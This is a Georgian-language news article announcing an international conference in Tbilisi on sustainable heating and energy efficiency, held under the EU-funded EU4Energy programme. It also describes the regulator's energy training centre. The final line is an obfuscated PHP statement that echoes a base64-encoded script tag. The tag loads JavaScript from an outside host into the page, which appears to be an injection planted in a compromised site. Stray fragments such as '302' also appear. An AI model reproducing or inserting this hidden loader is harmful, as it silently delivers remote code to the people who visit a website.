celsiusi
ავერსი შნაიდერი

საქართველოს ენერგეტიკისა და წყალმომარაგების მარეგულირებელ ეროვნულ კომისიასთან (სემეკ) არსებული ენერგეტიკის სასწავლო ცენტრისა და ევროპის ენერგეტიკის მარეგულირებელთა საბჭოს ორგანიზებით 15-16 აპრილს, ქ. თბილისში მდგრადი გათბობისა და ენერგოეფექტურობის შესახებ საერთაშორისო კონფერენცია გაიმართება. მასში მონაწილეობას მიიღებენ სემეკის, ეკონომიკისა და მდგრადი განვითარების სამინისტროს, ენერგეტიკის სექტორში მოქმედი ორგანიზაციების, არასამთავრობო სექტორის, ენერგეტიკის სასწავლო ცენტრისა და სხვადასხვა საერთაშორისო ორგანიზაციების ხელმძღვანელი პირები, ქართველი და უცხოელი ექსპერტები. 

კონფერენციას გახსნის სემეკის თავმჯდომარე, დავით ნარმანია. კონფერენცია ტარდება ევროპის ენერგეტიკის მარეგულირებელთა საბჭოს „აღმოსავლეთ პარტნიორობის ქვეყნებში სუფთა ენერგიებზე ტრანზაქციის ხელშეწყობის“ ევროკავშირის პროექტის EU4Energy-ს ფარგლებში.

კონფერენციის მიზანია მდგრადი გათბობისა და ენერგოეფექტურობის შესახებ შესაძლებლობების გაძლიერება და გამოცდილების გაზიარება, პოლიტიკის შემუშავება და თანამედროვე მიდგომების განვითარება. კონფერენციის მონაწილეები იმსჯელებენ განახლებადი ენერგიების ინტეგრირებისა და კლიმატის ცვლილების პრობლემის გადაჭრის გზებზე.

პანელური დისკუსიების ფორმატში, მონაწილეებს შესაძლებლობა ექნებათ მიიღონ ინფორმაცია გათბობის მდგრადობის გაუმჯობესების კუთხით არსებული სტრატეგიებისა და ენერგოეფექტურობასთან დაკავშირეული ინიციატივების შესახებ, სუფთა ენერგიების ხელშეწყობის მექანიზმების შესახებ ენერგეტიკული გაერთიანებების მეშვეობით, გათბობისა და ენერგოეფექტურობის კუთხით აღმოსავლეთ პარტნიორობის ქვეყნებში არსებული მდგრადობის შესახებ.

EU4ENERGY-ს ინიციატივა დაფინანსებულია ევროკავშირის მიერ 8.5 მილიონი ევროს ოდენობით და ერთობლივად ხორციელდება ევროპის ენერგეტიკის მარეგულირებელთა საბჭოს (CEER), ენერგეტიკის საერთაშორისო სააგენტოს (IEA) და ენერგეტიკული გაერთიანების სამდივნოს (EnCS) მიერ. პროგრამა ხაზს უსვამს ევროკავშირს, განმახორციელებელ ქვეყნებსა და ბენეფიციარ უწყებებს შორის თანამშრომლობის მნიშვნელობას რეფორმების განხორციელებისა და მოქალაქეებისათვის კონკრეტული სასარგებლო ზომების მიღების პროცესში.

საქართველოს ენერგეტიკისა და წყალმომარაგების მარეგულირებელ ეროვნულ კომისიასთან (სემეკ) არსებული ელიზბარ ერისთავის სახელობის ენერგეტიკის სასწავლო ცენტრის მიზანია ელექტროენერგეტიკის, ბუნებრივი  გაზის, წყალმომარაგებისა და მელიორაციის სექტორების  აქტუალურ საკითხებზე საზოგადოების ცნობიერების ამაღლება, პროფესიული განვითარებისა და კვალიფიკაციის ამაღლებისთვის სპეციალური სასწავლო კურსების/პროგრამების განხორციელება, ქალთა ჩართულობის ზრდა ენერგეტიკის სექტორში, სკოლის მოსწავლეებისთვის საგანმანათლებლო პროექტების განხორციელება და სხვა. ენერგეტიკის სასწავლო ცენტრში დაინტერესებულ პირებს აქვთ შესაძლებლობა, კვალიფიკაციის ამაღლების მიზნით, გაიარონ სასწავლო კურსები ელექტროენერგეტიკის, ბუნებრივი გაზის, წყალმომარაგებისა და მელიორაციის, სატარიფო რეგულირების შესახებ.

302
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");